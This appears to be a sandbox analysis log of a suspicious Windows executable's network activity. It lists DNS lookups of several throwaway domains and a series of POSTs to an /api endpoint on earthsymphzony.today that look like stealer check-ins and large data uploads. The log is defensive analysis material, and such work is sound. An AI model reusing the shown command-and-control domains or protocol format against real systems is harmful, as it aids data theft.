Mar 5, 2025 09:16:54.086344957 CET | 53 | 61579 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.101742983 CET | 50023 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.112267971 CET | 53 | 50023 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.124936104 CET | 62223 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.134692907 CET | 53 | 62223 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.268846989 CET | 57190 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.297446012 CET | 53 | 57190 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.372741938 CET | 62349 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.384160042 CET | 53 | 62349 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.396054029 CET | 56090 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.409730911 CET | 53 | 56090 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.415777922 CET | 50506 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.426354885 CET | 53 | 50506 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:16:54.432214975 CET | 62980 | 53 | 192.168.2.7 | 1.1.1.1
Mar 5, 2025 09:16:54.449707985 CET | 53 | 62980 | 1.1.1.1 | 192.168.2.7
Mar 5, 2025 09:17:35.678509951 CET | 53 | 60099 | 162.159.36.2 | 192.168.2.7
Mar 5, 2025 09:17:36.189665079 CET | 53 | 51020 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 5, 2025 09:16:53.980285883 CET | 192.168.2.7 | 1.1.1.1 | 0x498a | Standard query (0) | dawtastream.bet | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.075835943 CET | 192.168.2.7 | 1.1.1.1 | 0xb7bc | Standard query (0) | foresctwhispers.top | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.101742983 CET | 192.168.2.7 | 1.1.1.1 | 0x719e | Standard query (0) | tracnquilforest.life | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.124936104 CET | 192.168.2.7 | 1.1.1.1 | 0x38b4 | Standard query (0) | collapimga.fun | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.268846989 CET | 192.168.2.7 | 1.1.1.1 | 0xa225 | Standard query (0) | seizedsentec.online | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.372741938 CET | 192.168.2.7 | 1.1.1.1 | 0x7f8f | Standard query (0) | strawpeasaen.fun | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.396054029 CET | 192.168.2.7 | 1.1.1.1 | 0x13a | Standard query (0) | quietswtreams.life | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.415777922 CET | 192.168.2.7 | 1.1.1.1 | 0xda09 | Standard query (0) | starrynsightsky.icu | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.432214975 CET | 192.168.2.7 | 1.1.1.1 | 0xf16 | Standard query (0) | earthsymphzony.today | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 5, 2025 09:16:53.989761114 CET | 1.1.1.1 | 192.168.2.7 | 0x498a | Name error (3) | dawtastream.bet | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.086344957 CET | 1.1.1.1 | 192.168.2.7 | 0xb7bc | Name error (3) | foresctwhispers.top | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.112267971 CET | 1.1.1.1 | 192.168.2.7 | 0x719e | Name error (3) | tracnquilforest.life | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.134692907 CET | 1.1.1.1 | 192.168.2.7 | 0x38b4 | Name error (3) | collapimga.fun | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.297446012 CET | 1.1.1.1 | 192.168.2.7 | 0xa225 | Name error (3) | seizedsentec.online | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.384160042 CET | 1.1.1.1 | 192.168.2.7 | 0x7f8f | Name error (3) | strawpeasaen.fun | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.409730911 CET | 1.1.1.1 | 192.168.2.7 | 0x13a | Name error (3) | quietswtreams.life | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.426354885 CET | 1.1.1.1 | 192.168.2.7 | 0xda09 | Name error (3) | starrynsightsky.icu | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:16:54.449707985 CET | 1.1.1.1 | 192.168.2.7 | 0xf16 | No error (0) | earthsymphzony.today | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
• earthsymphzony.today
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:16:55 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: earthsymphzony.today
2025-03-05 08:16:55 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-03-05 08:16:55 UTC | 572 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 05 Mar 2025 08:16:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BpIJ7uHiYcbFeSVzk5TM%2FSWipGNSxmX95z2h%2B0awfae1lON3g7XOHooiqwUXW0mqL%2FaMu2z0oZz%2BnaZKZAGPCQ%2FVfq9wwEFSrSXBXyc5NbNEaqIYuFIMJojFSU98pKzObnRFOMXKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82c88ab50c358-EWR
2025-03-05 08:16:55 UTC | 797 | IN | Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-05 08:16:55 UTC | 1369 | IN | Data Ascii: ref="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document
2025-03-05 08:16:55 UTC | 1369 | IN | Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
2025-03-05 08:16:55 UTC | 1021 | IN | Data Ascii: p-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-
2025-03-05 08:16:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:16:55 UTC | 357 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 43
Host: earthsymphzony.today
2025-03-05 08:16:55 UTC | 43 | OUT | Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 77 31 53 6c 46 2d 2d 26 6a 3d
Data Ascii: act=receive_message&ver=4.0&lid=tw1SlF--&j=
2025-03-05 08:16:57 UTC | 830 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:16:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8t96%2FhfXr7LH%2FyN%2FcVoyjbMKZBklZ%2FCHICGUsJUZ%2FAGB3gHjclTVdkUdewan2u9%2BBp0IqP1Q67i2JTVBAIIOSVr1hxAw8L4LOjl2UKisR5MJTz6N9Vv2XL7Y8ofhSReL69IvB1TUYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82c8cffca14a8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12166&min_rtt=2040&rtt_var=6955&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3066&recv_bytes=1036&delivery_rate=2147058&cwnd=152&unsent_bytes=0&cid=ff872a9f8c70f57b&ts=1476&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:16:58 UTC | 369 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=CH331FBUMJ1X
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12805
Host: earthsymphzony.today
2025-03-05 08:16:58 UTC | 12805 | OUT | Data Ascii: --CH331FBUMJ1XContent-Disposition: form-data; name="act"send_message--CH331FBUMJ1XContent-Disposition: form-data; name="lid"tw1SlF----CH331FBUMJ1XContent-Disposition: form-data; name="pid"2--CH331FBUMJ1XContent-Disposition: form-
2025-03-05 08:16:59 UTC | 831 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:16:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqkNaSTbMAK21eWd07%2FclHCB2ZHh5EZAfZk%2BNAyM9cTte3wjnIUGDXWLBHJemrGiaZwFLxwDQWPMxe%2Bm%2FvnqqQxEvhtzsVDuX%2B6ZDj%2FJ84D5964lu%2F5ibVFgufPskvQkRgnUDquiLw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82ca10aa34414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1567&rtt_var=598&sent=9&recv=18&lost=0&retrans=0&sent_bytes=3065&recv_bytes=13832&delivery_rate=2722187&cwnd=189&unsent_bytes=0&cid=351be00af922aea2&ts=569&x=0"
2025-03-05 08:16:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-03-05 08:16:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49709 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:17:00 UTC | 365 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=707WPNS1Q
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 6646
Host: earthsymphzony.today
2025-03-05 08:17:00 UTC | 6646 | OUT | Data Raw: 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
Data Ascii: --707WPNS1QContent-Disposition: form-data; name="act"send_message--707WPNS1QContent-Disposition: form-data; name="lid"tw1SlF----707WPNS1QContent-Disposition: form-data; name="pid"2--707WPNS1QContent-Disposition: form-data; name="
2025-03-05 08:17:00 UTC | 822 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:17:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDTjMHQxQUsA0YBHi3iKadUbWzcCeOx3Wl1sD2t%2FEysjjJ6QOVy2n8rKr63tPuQwCAJqEmx%2F9f5pK%2F7UjIUZAG2GkGkzLfipt0gIVMph92rjeVRlHRjUHT5eGTF0X9KoCjd3YwMA2w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82ca8bc398ca1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1826&rtt_var=694&sent=8&recv=13&lost=0&retrans=0&sent_bytes=3066&recv_bytes=7647&delivery_rate=2349785&cwnd=184&unsent_bytes=0&cid=1f5b6bf185bf25b4&ts=479&x=0"
2025-03-05 08:17:00 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-03-05 08:17:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49725 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:17:02 UTC | 371 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9WX7PLJNJ0A4ZC
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20374
Host: earthsymphzony.today
2025-03-05 08:17:02 UTC | 15331 | OUT | Data Raw: 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
Data Ascii: --9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="act"send_message--9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="lid"tw1SlF----9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="pid"3--9WX7PLJNJ0A4ZCContent-Dispositio
2025-03-05 08:17:02 UTC | 5043 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:18 UTC | 272 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:17:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 91b82cb73eeb42e9-EWR
alt-svc: h3=":443"; ma=86400
2025-03-05 08:17:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-03-05 08:17:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49834 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:17:19 UTC | 365 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=EBABCEGLZ
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 2301
Host: earthsymphzony.today
2025-03-05 08:17:19 UTC | 2301 | OUT | Data Raw: 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
Data Ascii: --EBABCEGLZContent-Disposition: form-data; name="act"send_message--EBABCEGLZContent-Disposition: form-data; name="lid"tw1SlF----EBABCEGLZContent-Disposition: form-data; name="pid"1--EBABCEGLZContent-Disposition: form-data; name="
2025-03-05 08:17:19 UTC | 823 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:17:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvJR1zORjhlgxrqJQQZWX%2FSxu39OIS4btU2hduefpIyVb2ha4sresvhgOX2zOnjmXHazUcEyEI8V3HAKZBsgnXq6Oreei8FiCwRdVU9HiRruYPw5y%2F3cPDoup%2FasRFhUP8r9VMY%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82d215d5e4414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1685&rtt_var=636&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3065&recv_bytes=3302&delivery_rate=2570422&cwnd=189&unsent_bytes=0&cid=c1802ea8a779ebf3&ts=443&x=0"
2025-03-05 08:17:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-03-05 08:17:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49844 | 104.21.64.1 | 443 | 6644 | C:\Users\user\Desktop\random(2).exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:17:20 UTC | 376 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=4A1W8BCUKKMJ7AS22F
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 584009
Host: earthsymphzony.today
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f
Data Ascii: --4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="act"send_message--4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="lid"tw1SlF----4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="pid"1--4A1W8BCUKKMJ7AS22FCo
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:20 UTC | 15331 | OUT | Data Raw: (binary payload, not printable; omitted)
2025-03-05 08:17:22 UTC | 836 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:17:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1pKwGHCeGDErisk5TlMg%2Fx7yJJYFOOF%2Fss0tLV%2FeRZqEDQ7aS3MPMHk%2FGAuvUsNUhl0FZBBi1CiB1Cp%2FX901zwYsxo8z%2FQO3x6X6b0CFQwUo78HHpSCt%2FILrp02ZEwsl7i4qZ51Yg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82d2a4863c358-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1568&rtt_var=631&sent=202&recv=598&lost=0&retrans=0&sent_bytes=3065&recv_bytes=586693&delivery_rate=2512908&cwnd=153&unsent_bytes=0&cid=93ecbaf1cb375c51&ts=1523&x=0"


Session ID: 7
Source IP: 192.168.2.7
Source Port: 49857
Destination IP: 104.21.64.1
Destination Port: 443
PID: 6644
Process: C:\Users\user\Desktop\random(2).exe

Timestamp | Bytes transferred | Direction | Data

2025-03-05 08:17:22 UTC | 357 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: earthsymphzony.today

2025-03-05 08:17:22 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 77 31 53 6c 46 2d 2d 26 6a 3d 26 68 77 69 64 3d 44 33 41 32 46 34 43 39 34 34 46 41 30 45 32 42 33 44 31 38 38 35 41 39 33 31 43 41 43 32 45 33
Data Ascii: act=get_message&ver=4.0&lid=tw1SlF--&j=&hwid=D3A2F4C944FA0E2B3D1885A931CAC2E3

2025-03-05 08:17:23 UTC | 825 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:17:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
